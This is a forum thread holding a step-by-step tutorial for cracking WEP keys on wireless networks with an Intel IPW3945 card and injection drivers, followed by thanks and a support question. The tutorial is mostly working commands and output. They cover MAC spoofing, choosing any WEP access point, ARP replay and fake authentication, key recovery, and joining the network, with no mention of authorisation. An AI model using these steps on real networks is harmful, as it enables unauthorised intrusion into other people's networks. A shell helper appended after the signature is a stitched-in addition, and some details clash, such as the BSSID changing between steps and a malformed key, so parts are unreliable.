
Thread: Getting IPW3945 to Inject with IPWRAW, And How to crack WEP Tutorial

  1. #1
    Just burned his ISO (Join Date: Dec 2007, Posts: 5)

    Getting IPW3945 to Inject with IPWRAW, And How to crack WEP Tutorial

    Hey everybody!

    In Backtrack 2, and almost all other Linux distros, Intel-based cards can not inject packets into wireless networks. This step-by-step guide is written for the people that are having trouble getting the injection patches to work. If you follow this from start to finish, I'm 90% sure your IPW3945-based card WILL be able to inject =]

    After having quite a bit of trouble myself, I wrote this tutorial from my own experience, for anybody that is having trouble with the IPW3945 cards injecting. This tutorial was originally made for w4ck1ng.com, but I've decided to post it on the remote-exploit.org forums.
    Please do not rip this and post it on other sites as your own. Don't be harsh on it either; this is the first tutorial I've written. I take no responsibility for anything that may go wrong. =p


    First of all, this tutorial is written for 'BackTrack 2', so please do not post here asking for help using BT3 Beta. Use the Remote Exploit forums for that.

    Contents :

    1. Starting off, Updating Aircrack-NG
    2. Downloading and installing IPWRAW
    3. Loading and Unloading the Drivers
    4. Cracking WEP with our new drivers
    5. Cracking WEP with our new drivers : Part II

    Starting off, Updating Aircrack-NG

    In Backtrack 2 Stable, the IPW3945 drivers are not loaded by default, so we need to navigate and click on:

    Code:
    Menu -> Backtrack -> Radio Network Analysis -> 80211 -> Misc -> Load IPW3945

    This loads the drivers; every time we start up we have to do this. Later I will introduce the "alias" command, so that we can easily load and unload all of the drivers.

    Once you have loaded the IPW3945 drivers, be sure to connect to a wireless network WITH internet access by using "Wireless Assistant", located in:

    Code:
    Menu -> Internet -> Wireless Assistant

    Once we have successfully done this, we need to update our "aircrack-ng" suite. Open a shell and type:

    Code:
    /pentest/wireless/update-aircrack.sh

    This step is fairly important, as the updated aircrack suite adds the PTW (-z) cracking option, which cracks WEP keys a lot faster than aircrack by itself.

    Downloading and installing IPWRAW

    OK! Now we have successfully updated the aircrack suite, it's time to get down to business and get these drivers working!

    Download the IPWraw drivers from here:

    hxxp://rapidshare.com/files/85198775/ipwraw-ng-2.0.0-10072007.tar.bz2.html

    Save the file in the /tmp directory.

    Go back into the shell again, and change to your tmp dir by typing:

    Code:
    cd /tmp

    Then do the following in the shell:

    Extract the file we downloaded:

    Code:
    tar -xjf ipwraw-ng*

    NOTE: The * means to press <TAB> to complete the filename automatically.

    Change the Current Directory to the one you extracted:

    Code:
    cd ipwraw-ng

    Make the installation:

    Code:
    make
    make install
    make install_ucode

    OPTIONAL:

    We can now blacklist IPWRAW, so that it does not load on startup. We do this by entering:

    Code:
    echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
    sudo depmod -ae

    NOTE: If you blacklist IPWRAW, you usually get little warnings when loading/unloading drivers. These are fine.

    EG: WARNING: /etc/modprobe.d/ipwraw line 1: ignoring bad line starting with 'Blacklist

    Loading and Unloading the Drivers

    We have now finished installing IPWRAW; we should now be able to inject while cracking WEP!

    Later, I will explain the use of "alias" commands, which will help us load and unload the drivers more easily. For now we can do this.

    Load the IPWRAW drivers with this command:

    Code:
    /tmp/ipwraw-ng/load

    Warning: This will put your card into monitor mode; you will not be able to access the internet whilst you have the IPWraw drivers loaded. And you can NOT have both IPW3945 and IPWRAW drivers running at the same time.

    You should now get a message saying something about 'rtap0' being ready. This is a good thing =D

    To UNLOAD the IPWraw drivers, enter:

    Code:
    /sbin/modprobe -r ipwraw

    And to reload the IPW3945 drivers to access the internet, type:

    Code:
    /sbin/modprobe ipw3945
    /usr/src/drivers/ipw3945-1.2.0/load

    ...And to unload the IPW3945 drivers:

    Code:
    /sbin/modprobe -r ipw3945
    /usr/src/drivers/ipw3945-1.2.0/unload


    Cracking WEP with our new drivers


    The first thing we need to do is to edit our kismet.conf file to recognise our new interfaces.
    Do this by typing into a shell:

    Code:
    nano /etc/kismet/kismet.conf

    Scroll all the way to the bottom of the file and enter this for "source":

    Code:
    source=ipw3945,wifi0,Intel

    Save by pressing "Ctrl + O", then Enter. Then exit by pressing "Ctrl + X".

    Now we are almost ready to start; first of all we need some information on the target.

    In the shell, enter:

    Code:
    kismet

    After a few moments, Kismet should load up, and you should have a screen with at least one wireless AP on it. If you don't, you need to find some, because if there are none there, we can't crack anything!

    We now need to select a network from the list, and note some of its details. See the "W" up the top? This stands for WEP. Each AP will have Y or N; we need to choose one that has a "Y", which means it is using WEP. We should choose a network that does have some packet flow, because we need to know that we are in good range of the router.

    Open up a KWrite document and note down the name, channel, and the IP range of the target. The IP range may not be there; that is fine.

    Press "Ctrl + C" to shut down Kismet.


    We should now fake our MAC address; we do this by typing this into a shell:

    Code:
    macchanger -m 00:11:22:33:44:55 wifi0

    Our output should be:

    Code:
    Current MAC: 00:xx:xx:xx:xx:xx (unknown)
    Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)

    Now we must run 'airodump' on rtap0:

    Code:
    airodump-ng rtap0

    You should see a few BSSIDs etc. We need to find our target: look at the ESSID and find the target we saw in Kismet. We can see that it is WEP, and we have a bunch of other information about the AP.

    Press "Ctrl + C" to stop airodump, and copy the entire line of your target into KWrite, eg:

    Code:
    BSSID              PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
    00:56:B4:6C:CD:92    0       73     20    3   6  54  WEP              linksys

    The main thing we need here is the channel number, (6) in this case, and the BSSID.

    Now we must edit our wireless card by changing some options with the ones we just gathered. Follow the commands given below:

    Code:
    ifconfig wifi0 down
    # Change to the AP's BSSID
    nano /sys/class/net/wifi0/device/bssid
    # Change to the channel of the target AP
    nano /sys/class/net/wifi0/device/channel
    # Change the value from 108 to 2
    nano /sys/class/net/wifi0/device/rate
    ifconfig wifi0 up

    Now we are on the same channel, etc. as our target.

    Now comes the fun stuff: actually getting the WEP key.

    In a shell put:

    Code:
    airodump-ng --channel 6 --write ExPlOiT -b 00:16:B6:6C:CD:92 wifi0

    The dump should save as "ExPlOiT.cap" in "/". The -b option allows us to only capture data from our target, and not other APs.

    We now leave that shell open capturing data, and open a new shell.

    Now run aireplay-ng:

    Code:
    aireplay-ng -3 -b <mac address of ap> -h <mac of my interface> wifi0
    E.G aireplay-ng -3 -b 00:16:B6:6C:CD:92 -h 00:11:22:33:44:55 wifi0

    This tells us how many ARP requests we are getting. Leave it running also, and open ANOTHER new shell. This should be our third shell.

    We now associate ourselves with the AP!

    First we will lower the rate of our card by doing this:

    Code:
    iwconfig wifi0 rate 1M

    Now we associate ourselves with the AP!

    Code:
    aireplay-ng -1 0 -e <Name of Network> -a <BSSID> -h <YOUR MAC> wifi0
    EG. aireplay-ng -1 0 -e Motorola9214 -a 00:16:B6:6C:CD:92 -h 00:11:22:33:44:55 wifi0

    We should get output like this:

    Code:
    03:35:59 Waiting for beacon frame (BSSID: 00:16:B6:6C:CD:92)
    03:35:59 Sending Authentication Request
    03:35:59 Authentication successful
    03:35:59 Sending Association Request
    03:36:04 Association successfull :-)
    bt /#

    Wait patiently, watching our aireplay window...

    Our "got XXXXX ARP Requests" should start rocketing now. We should wait until we have captured about ~60,000, or about 100,000 for maximal results.

    Once we have reached those marks, press "CTRL + C" in all three shells to stop the process.

    Proceed to Part II!

  2. #2
    Just burned his ISO (Join Date: Dec 2007, Posts: 5)

    Part II

    Use one of the shells to run aircrack.

    Code:
    aircrack-ng -z /ExPlOiT-01.cap

    The -z option is new in aircrack; this is the reason why we updated the aircrack suite before.

    This is the output!!

    Code:
    [00:00:00] Tested 80/1400000 keys (got 58674 IVs)

    KB    depth   byte(vote)
     0    0/  2   62( 298) 04( 282) 80( 274) 6C( 272) 20( 270) A0( 266)
     1    0/  1   DE( 340) 6A( 265) C5( 261) 0A( 260) B9( 260) CF( 260)
     2    0/  1   80( 335) 14( 271) 71( 265) 02( 263) 2E( 263) 65( 262)
     3    2/  5   C9( 266) 94( 263) 48( 262) 87( 262) F7( 262) 08( 257)
     4    0/  1   4E( 296) EE( 270) 41( 268) D3( 266) 89( 265) 68( 262)
     5    0/  1   23( 332) 9B( 271) 47( 267) 77( 264) FF( 263) 54( 262)
     6    0/  1   BC( 308) C7( 279) 3E( 272) 8D( 270) E4( 267) ED( 264)
     7    0/  1   C1( 319) 1E( 270) BF( 266) 75( 265) 9C( 265) 94( 261)
     8    0/  4   A8( 280) F5( 272) 55( 269) FC( 266) F2( 263) 89( 262)
     9    0/  1   6A( 291) 8F( 268) 9B( 268) DE( 266) B8( 264) 36( 262)
    10    0/  2   00( 297) E2( 282) C1( 274) 69( 263) D7( 263) 67( 259)
    11    0/  1   33( 344) 2D( 267) 30( 262) AD( 261) 1A( 258) 68( 258)
    12    0/  1   93( 298) 6B( 270) F9( 261) 05( 258) B0( 258) 4B( 256)

    >>KEY FOUND! [ 62E:80:88:4E:23:BC:C1:A8:6A:00:33:92 ]<<
    Decrypted correctly: 100%

    We found the key! "62E:80:88:4E:23:BC:C1:A8:6A:00:33:92"


    Now we can connect to the wireless network. Remember how I said earlier we were going to make alias commands? This is the time.

    We are going to make multiple alias commands. This is all optional stuff, but it's easier to load and unload the drivers this way.

    Code:
    # Aliases use the form: alias name='command'
    # They last for the current shell only; put them in ~/.bashrc to keep them.

    # Load the IPWRAW drivers
    alias rawload='/tmp/ipwraw-ng/load'
    # Unload the IPWRAW drivers
    alias rawuload='/sbin/modprobe -r ipwraw'

    # Load the IPW3945 drivers, part 1
    alias 3945L1='/sbin/modprobe ipw3945'
    # Load the IPW3945 drivers, part 2
    alias 3945L2='/usr/src/drivers/ipw3945-1.2.0/load'

    # Unload the IPW3945 drivers, part 1
    alias 3945U1='/sbin/modprobe -r ipw3945'
    # Unload the IPW3945 drivers, part 2
    alias 3945U2='/usr/src/drivers/ipw3945-1.2.0/unload'

    After we have done this, we remove the IPWRAW drivers:

    Code:
    rawuload

    And load the IPW3945 drivers:

    Code:
    3945L1
    3945L2

    Now we can use Wireless Assistant or the shell to connect to the WEP-enabled wireless network!

    THE END!!

    Congratulations! Hopefully you now have installed the IPWRAW drivers, and cracked a WEP key!!

    I hope this tutorial helped somebody; I spent quite a lot of time on it. I may add some pictures of things eventually..

    Feedback would be appreciated!

    SubJimbo

    If you enjoyed this tutorial, Please Visit w4ck1ng.com
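    The load/unload steps in Part I and the alias shortcuts in Part II both rest on one rule from the tutorial: ipwraw and ipw3945 drive the same card and must never be loaded together. The POSIX shell helper below is an added example, not part of the original post: it reads a /proc/modules-style listing, reports which of the two drivers is active, and says whether loading a given one is safe before you run modprobe or one of the aliases. The function names and the sample module listings are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original post). ipwraw and ipw3945 drive the
# same card and must never be loaded together, so check before switching.
# The module list is passed in as text so the logic can run offline; in real
# use call: loaded_wifi_driver "$(cat /proc/modules)"

# Print which Intel wifi driver is loaded: "ipwraw", "ipw3945", "both" or "none".
# /proc/modules has one module per line, with the module name in column 1.
loaded_wifi_driver() {
    has_raw=0
    has_3945=0
    for name in $(printf '%s\n' "$1" | awk '{print $1}'); do
        case "$name" in
            ipwraw)  has_raw=1 ;;
            ipw3945) has_3945=1 ;;
        esac
    done
    if [ "$has_raw" -eq 1 ] && [ "$has_3945" -eq 1 ]; then
        echo both
    elif [ "$has_raw" -eq 1 ]; then
        echo ipwraw
    elif [ "$has_3945" -eq 1 ]; then
        echo ipw3945
    else
        echo none
    fi
}

# Return 0 when driver $2 may be loaded given module list $1, else 1.
# Loading is safe only when no Intel wifi driver is loaded, or the requested
# one is already the active driver (a no-op); anything else means the other
# driver must be removed with modprobe -r first.
safe_to_load() {
    current=$(loaded_wifi_driver "$1")
    case "$current" in
        none) return 0 ;;
        "$2") return 0 ;;
        *)    return 1 ;;
    esac
}

# Constructed sample /proc/modules listings (only column 1 is inspected).
SAMPLE_RAW="ipwraw 147000 0 - Live 0xf8a00000
ieee80211 40000 1 ipwraw, Live 0xf8900000
snd_hda_intel 20000 1 - Live 0xf8800000"

SAMPLE_NONE="ieee80211 40000 0 - Live 0xf8900000
snd_hda_intel 20000 1 - Live 0xf8800000"
```

    Wrap the modprobe call in `safe_to_load "$(cat /proc/modules)" ipwraw && /sbin/modprobe ipwraw` to refuse the load when the other driver is still present.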

  3. #3
    Developer (Join Date: Mar 2007, Posts: 6,124)

    We appreciate the time you put into this tutorial; however, it has been covered at least ten times on this forum.

  4. #4
    Junior Member (Join Date: Dec 2007, Posts: 76)

    Good work, comprehensive info all there. A good structure.
    Pureh@te's right, but I'm sure this will help many still. Which is what it's about in the end, 'eh?

    peace

  5. #5
    Just burned his ISO (Join Date: Jan 2008, Posts: 15)

    Thanks for the info, it helped me to get my first WEP cracked.

  6. #6
    Junior Member Delta (Join Date: Nov 2007, Posts: 34)

    SubJimbo, I give you credit for doing this. Sweet tuto, no gaps in it! Perfect. This is probably the best one I've seen so far on this forum.
    g00d jo8

    DeLtA
    "Bart, with $10,000, we'd be millionaires! We could buy all kinds of useful things like...LOVE!"
    by, Homer J Simpson:cool:

  7. #7
    Just burned his ISO (Join Date: Dec 2007, Posts: 5)

    Thanks Delta, appreciate it.

    I tried to make it as complete as I possibly could, and I'm sure it covers just about everything.

  8. #8
    Junior Member Delta (Join Date: Nov 2007, Posts: 34)

    yep covers it all

    even knowing how it works i learned a little THX!!!

    __D-E-L-T-A__

  9. #9
    Junior Member Delta (Join Date: Nov 2007, Posts: 34)

    wohhhooww!!!
    I was playing around with my driver and now the ipwraw won't load.
    This is what I did: I removed it and reinstalled it, added it to the blacklist, and when I type
    ~#modprobe -r ipw3945
    ~#modprobe ipwraw
    the ipw3945 driver unloads but the ipwraw driver doesn't load!!!! The light stays orange (used to turn blue when successfully loaded).
    When I type in iwconfig the card doesn't show up at all!
    I'm using Ubuntu.

    PLZ HELP!!!!
    if you can

    DELTA

  10. #10
    Developer (Join Date: Mar 2007, Posts: 6,124)

    Quote Originally Posted by Delta:
    wohhhooww!!!
    I was playing around with my driver and now the ipwraw won't load.
    This is what I did: I removed it and reinstalled it, added it to the blacklist, and when I type
    ~#modprobe -r ipw3945
    ~#modprobe ipwraw
    the ipw3945 driver unloads but the ipwraw driver doesn't load!!!! The light stays orange (used to turn blue when successfully loaded).
    When I type in iwconfig the card doesn't show up at all!
    I'm using Ubuntu.

    PLZ HELP!!!!
    if you can

    DELTA

    This is a BackTrack support forum, not Ubuntu.
